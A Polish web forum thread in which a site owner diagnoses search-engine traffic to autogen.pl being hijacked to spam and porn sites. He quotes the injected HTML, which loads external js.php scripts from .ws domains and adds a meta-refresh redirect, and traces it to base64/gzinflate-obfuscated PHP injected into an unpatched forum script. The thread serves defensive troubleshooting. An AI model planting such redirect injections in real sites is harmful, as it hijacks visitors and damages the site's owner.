Problem: przekierowywane wejścia z Google

[Ecnelis]

Witam serdecznie. Mam bardzo dziwny problem, który najprawdopodobniej powjawił się na początku tego tygodnia (odwiedziny strony drastycznie spadły, a wcześniej nikt nie skajżył się, że coś dzieje się nie tak). A dzieje się i to coś bardzo złego!

Otóż przy próbie wejścia na stronę z wyników w wyszukiwarce następuje... przekierowanie na inne serwisy (oferujące różne produkty, a przeważnie porno)!

Problem dotyczy strony autogen.pl i z tego, co zauważyłem występuje tylko w wyszukiwarce Google, Yahoo i Interii (w Onet, WP i Netsprint nie ma problemu) oraz przeglądarkach Internet Explorer i K-Meleon (w Opera, Firefox i Chrome nie ma problemu).

Jeśli ktoś nie może sprawdzić tego sam poniżej filmik z IE w roli głównej (3,8MB). Scenariusz: wchodzimy na Google.pl, wpisujemy autogen.pl, klikamy w pierwszy wynik i... zamiast wejść gdzie chcieliśmy dostajemy przekierowanie na stronę z porno DVD.

https://www.autogen.pl/box/wtf.avi

Między klikiem w link w wynikach Google a stroną końcową pojawia się grafika informująca o ładowaniu. W źródle strony z grafiką jest coś takiego:

<center><br><br><br><br><br><br><br><br><br><img src="https://redirws.ws/progress.gif" /><br><!-- . . . your . . . request . . in . . . progress . . . [i][tutaj masa kropek, więc je wyciąłem][/i] --><script type="text/javascript" src="https://s3rg.ws/js.php?fr=autogen.pl"></script><script type="text/javascript" src="https://parc.ws/js.php?fr=autogen.pl"></script><script type="text/javascript" src="https://redirws.ws/js.php?fr=autogen.pl"></script><noscript><meta http-equiv="refresh" content="0;url=https://redirws.ws/mt.php?fr=autogen.pl" /></noscript>

I to właściwie tyle, więcej symptomów nie zaobserwowałem (na FTP ze stroną nic dziwnego się nie pojawiło, na inne strony znajdujące się na tym samym serwerze można wejść bez problemu)... Czyżbym miał do czynienia z jakimś włamianiem/atakiem na stronę? Co tu począć z tym fantem?

[yavaho]

Ciekawe.

Proponuje wyciąć wszystkie skrypty JS na stronie a w pierwszej kolejności może static.woopra.com albo stat.4u.pl

[sttorm]

ktos mi kiedys pokazywal, iż można cos takiego zrobić, ale było to jakieś 2 lata temu

qrde teraz już nie pamietam jak to się dokladnie odbywa i na czym polega ale tak jak mowi poprzednim wywal wszystkie skrypty JS i wszystko co wychodzi na zewnątrz

jesli to nie pomoze szybka zmiana na nowe DNS z nowym IP

[Ecnelis]

Usunięcie statystyk Stat4U, Google i Woopra oraz reklam Google i elementów składowych jQuery nic nie zmienia...

jesli to nie pomoze szybka zmiana na nowe DNS z nowym IP

Czyli przeniesienie strony na inny serwer?

EDIT: Po niewielkim śledztwie udało mi się zlokalizować problem: kod php zakodowany w gzinflate base64_decod i wstrzyknięty do jednego z plików forum (ogólnie rzecz biorąc był to skrypt zacytowany przeze mnie w pierwszym poście) - zemściło się zapewne to, że mimo wychodzenia poprawek do forum w ogóle przez przeszło rok go nie aktualizowałem.